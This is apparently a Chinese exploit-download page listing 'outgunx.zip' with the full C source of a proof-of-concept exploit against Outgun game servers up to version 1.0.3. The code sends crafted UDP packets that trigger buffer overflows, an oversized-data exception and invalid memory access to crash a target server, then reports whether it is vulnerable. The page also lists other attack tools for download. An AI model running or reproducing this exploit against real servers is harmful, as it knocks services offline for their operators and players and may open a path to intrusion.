首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全工具>攻击程序>软件详细
软件名称:  outgunx.zip
文件类型:  
界面语言:  简体中文
软件类型:  国产软件
运行环境:  WinNT/2K/Xp
授权方式:  共享软件
软件大小:  12K
软件等级:  ★★★★☆
发布时间:  2006-05-15
官方网址: http://www.milw0rm.com 作者:Luigi
演示网址:
软件说明:  
Outgun <= 1.0.3 bot 2 Multiple Remote Vulnerabilities Exploit

/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <sys/param.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define stristr strcasestr
    #define ONESEC  1
#endif



#define VER                     "0.1"
#define PORT                    25000
#define BUFFSZ                  4096
#define BOFSZ                   400     // for exploiting ftype
#define DATA_BUF_SIZE           512     // if (len + ulen > DATA_BUF_SIZE) throw 66677;
#define CHREGSZ                 510     // not exploitable, it's here only for testing

#define GET32(x)                ntohl(*(uint32_t *)(x))

#define PUT8(x,y)               *x++ = y;
#define PUT16(x,y)              *(uint16_t *)x = htons(y);  \
                                x += 2;
#define PUT32(x,y)              *(uint32_t *)x = htonl(y);  \
                                x += 4;
#define PUTSTR(x,y)             x += mycpy(x, y);
#define PUTMEM(x,y,z)           memcpy(x, y, z);            \
                                x += z;

#define GAME_STRING             "Outgun"
#define GAME_PROTOCOL           "1.0"
#define LEETNET_VERSION         1
#define MAX_INCOMING_MESSAGES   64



void delimit(u_char *data);
int mycpy(u_char *dst, u_char *src);
int send_recv(int sd, u_char *in, int insz, u_char *out, int outsz, int err);
int create_rand_string(u_char *data, int len, u_int *seed);
int timeout(int sock, int sec);
u_int resolv(char *host);
void std_err(void);



struct  sockaddr_in peer;

enum Network_data_code {
    data_name_update,
    data_text_message,
    data_first_packet,
    data_frags_update,
    data_flag_update,
    data_rocket_fire,
    data_old_rocket_visible,
    data_rocket_delete,
    data_power_collision,
    data_score_update,
    data_sound,
    data_pup_visible,
    data_pup_picked,
    data_pup_timer,
    data_weapon_change,
    data_map_change,
    data_world_reset,
    data_gameover_show,
    data_start_game,
    data_deathbringer,
    data_file_request,
    data_file_download,
    data_file_ack,
    data_registration_token,
    data_registration_response,
    data_tournament_participation,
    data_crap_update,
    data_map_time,
    data_fire_on,
    data_fire_off,
    data_suicide,
    data_drop_flag,
    data_stop_drop_flag,
    data_change_team_on,
    data_change_team_off,
    data_map_exit_on,
    data_map_exit_off,
    data_client_ready,
    data_map_list,
    data_map_votes_update,
    data_map_vote,
    data_stats,
    data_team_stats,
    data_capture,
    data_kill,
    data_flag_take,
    data_flag_return,
    data_flag_drop,
    data_players_present,
    data_new_player,
    data_spawn,
    data_movements_shots,
    data_team_movements_shots,
    data_fav_colors,
    data_name_authorization_request,
    data_server_settings,
    data_reset_map_list,
    data_stats_ready,
    data_player_left,
    data_team_change,
    data_5_min_left,
    data_1_min_left,
    data_30_s_left,
    data_time_out,
    data_extra_time_out,
    data_normal_time_out,
    data_too_much_talk,
    data_mute_notification,
    data_tournament_update_failed,
    data_player_mute,
    data_player_kick,
    data_disconnecting,
    data_idlekick_warning,
    data_map_change_info,
    data_broken_map,
    data_reserved_range_first,  // reserve some codes for extensions that are otherwise protocol compatible
    data_reserved_range_last = data_reserved_range_first + 20,  // make sure you don't use more!
    data_return_to_reserved_range_start_hack = data_reserved_range_first - 1,
    data_current_map
    // insert extensions here
};



int main(int argc, char *argv[]) {
    int     sd,
            attack,
            len;
    u_int   seed,
            pckid,
            smsgid;
    u_short port = PORT;
    u_char  buff[BUFFSZ],
            bof[DATA_BUF_SIZE + 1],
            *p,
            *b;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Outgun <= 1.0.3 (bot 2) multiple vulnerabilities " VER "\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <attack> <host> [port(%hu)]\n"
            "\n"
            "Attacks:\n"
            " 1 = data_file_request command buffer-overflow\n"
            " 2 = big data exception (throw 66677)\n"
            " 3 = invalid memory access in messages handling\n"
            " 4 = changeRegistration, strcpy() on a global var of 64 bytes\n"
            "\n", argv[0], port);
        exit(1);
    }

    attack = atoi(argv[1]);

    if(argc > 3) port    = atoi(argv[3]);
    peer.sin_addr.s_addr = resolv(argv[2]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), port);

    seed = time(NULL);

    printf("- request info:\n");
    p = buff;
    PUT32(p, 0);                        // packid
    PUT32(p, 200);                      // smsgid = 200
    PUT16(p, seed);                     // clientside gamespy entry (merged here)

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();
    len = send_recv(sd, buff, p - buff, buff, sizeof(buff), 1);
    close(sd);
    printf("  %s\n", buff + 10);

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    printf("- join server\n");
    p = buff;
    PUT32(p, 0);                        // packid
    PUT32(p, 1);                        // smsgid = hello
    PUT32(p, LEETNET_VERSION);          // LEETNET_VERSION

    b = p;  p += 4;
    PUTSTR(p, GAME_STRING);
    PUTSTR(p, GAME_PROTOCOL);
    create_rand_string(bof, 32, &seed);
    PUTSTR(p, bof);
    PUTSTR(p, "");                      // m_serverPassword (not implemented in this PoC)
    PUTSTR(p, "");                      // m_playerPassword (not implemented in this PoC)
    PUT32(b, (p - b) - 4);

    len = send_recv(sd, buff, p - buff, buff, sizeof(buff), 1);

    pckid  = GET32(buff);
    smsgid = GET32(buff + 4);
    if(!pckid && (smsgid == 201)) {
        printf("\nError: server is full\n\n");
        exit(1);
    }

/*
    peer.sin_port = *(uint16_t *)(buff + 10);
    len = send_recv(sd, "", 0, NULL, 0, 0);
    peer.sin_port = htons(port);
*/

        // NLulong                          packet_id
        // NLulong                          acked packet (latest received by remote)
        // NLbyte                           number of reliable messages
        // for each reliable message:
        //      NLulong                     message id
        //      NLshort                     message size
        //      NLbyte[message size]        the reliable message data
        // (FIX: NLshort                    unreliable data size --- inferido do packet size!!!)
        // NLbyte[unreliable data size]     all the unreliable data glued in a big chunk

    printf("- send malicious data\n");
    p = buff;
    PUT32(p, 1);                        // packet_id
    PUT32(p, pckid);                    // acked packet
    if(attack == 3) {
        PUT8(p, MAX_INCOMING_MESSAGES); // number of messages
    } else {
        PUT8(p, 1);                     // number of messages
    }

    PUT32(p, 1);                        // first message (message id)
    b = p;  p += 2;                     // message size

    if(attack == 1) {
        PUT8(p, data_file_request);
        memset(bof, 'a', BOFSZ);
        bof[BOFSZ] = 0;
        PUTSTR(p, bof);                 // ftype
        PUTSTR(p, "fname");             // fname

    } else if(attack == 2) {
        PUT8(p, data_name_update);      // any command is the same
        memset(p, 0xff, DATA_BUF_SIZE);
        p += DATA_BUF_SIZE;

    } else if(attack == 3) {
        PUT8(p, data_name_update);      // any command is the same

    } else if(attack == 4) {
        PUT8(p, data_registration_token);
        memset(bof, 'z', CHREGSZ);
        bof[CHREGSZ] = 0;
        PUTSTR(p, bof);
    }

    if(attack == 3) {
        printf("- note: if the server doesn't crash, retry again\n");
        PUT16(b, -1);
    } else {
        PUT16(b, (p - b) - 2);
    }

    len = send_recv(sd, buff, p - buff, buff, sizeof(buff), 0);

    close(sd);

    printf("- check server:\n");
    p = buff;
    PUT32(p, 0);
    PUT32(p, 200);
    PUT16(p, seed);

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();
    if(send_recv(sd, buff, p - buff, buff, sizeof(buff), 0) < 0 ) {
        printf("\n  Server IS vulnerable!!!\n\n");
    } else {
        printf("\n  Server doesn't seem vulnerable\n\n");
    }
    close(sd);
    return(0);
}



void delimit(u_char *data) {
    while(*data && (*data != '\n') && (*data != '\r')) data++;
    *data = 0;
}



int mycpy(u_char *dst, u_char *src) {
    u_char  *p;

    for(p = dst; *src; src++, p++) {
        *p = *src;
    }
    *p++ = 0;
    return(p - dst);
}



int send_recv(int sd, u_char *in, int insz, u_char *out, int outsz, int err) {
    int     retry,
            len;

    if(in && !out) {
        if(sendto(sd, in, insz, 0, (struct sockaddr *)&peer, sizeof(peer))
          < 0) std_err();
        return(0);

    } else if(in) {
        for(retry = 3; retry; retry--) {
            if(sendto(sd, in, insz, 0, (struct sockaddr *)&peer, sizeof(peer))
              < 0) std_err();
            if(!timeout(sd, 1)) break;
        }

        if(!retry) {
            if(!err) return(-1);
            fputs("\nError: socket timeout, no reply received\n\n", stdout);
            exit(1);
        }

    } else {
        if(timeout(sd, 3) < 0) return(-1);
    }

    len = recvfrom(sd, out, outsz, 0, NULL, NULL);
    if(len < 0) std_err();
    return(len);
}



int create_rand_string(u_char *data, int len, u_int *seed) {
    u_int   rnd;
    u_char  *p;
    const static u_char table[] =
                "0123456789"
                "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                "abcdefghijklmnopqrstuvwxyz";

    rnd = *seed;
    p   = data;

    len = rnd % len;
    if(len < 3) len = 3;

    while(--len) {
        rnd = (rnd * 0x343FD) + 0x269EC3;
        rnd >>= 3;
        *p++ = table[rnd % (sizeof(table) - 1)];
    }
    *p++ = 0;

    *seed = rnd;
    return(p - data);
}



int timeout(int sock, int sec) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec  = sec;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u_int resolv(char *host) {
    struct  hostent *hp;
    u_int   host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_int *)(hp->h_addr);
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif
下载地址: 进入下载地址列表
下载说明: ☉推荐使用网际快车下载本站软件,使用 WinRAR v3.10 以上版本解压本站软件。
☉如果这个软件总是不能下载的请点击报告错误,谢谢合作!!
☉下载本站资源,如果服务器暂不能下载请过一段时间重试!
☉如果遇到什么问题,请到本站论坛去咨寻,我们将在那里提供更多 、更好的资源!
☉本站提供的一些商业软件是供学习研究之用,如用于商业用途,请购买正版。
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热门软件
·qwks.cpp(MS03-049)
·ms05039.rar
·fsie.rar
·Serv-U FTP溢出漏洞利用工具
·NBSI2破解版
·MS08-067.rar
·提权大杀器(2010黑帽大会公布的
·Churrasco.zip
·tfn2k.tgz
·ms04-011.rar
·SMBdie
·KiTrap0D.zip
  相关软件
·openttdx.zip
·empiredos.zip
·genecysbof.zip
·skulltagfs.zip
·arptools-1.0.0.tar.gz
·raydiumx.zip
·f_WinSniff v2.0.rar
·WinArpAttacker3.50.rar
·wed.vbs
·BTvoyager.zip
·sophos_chunkheap.chm
·nbsi3.0 xiaolu增强版
 
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved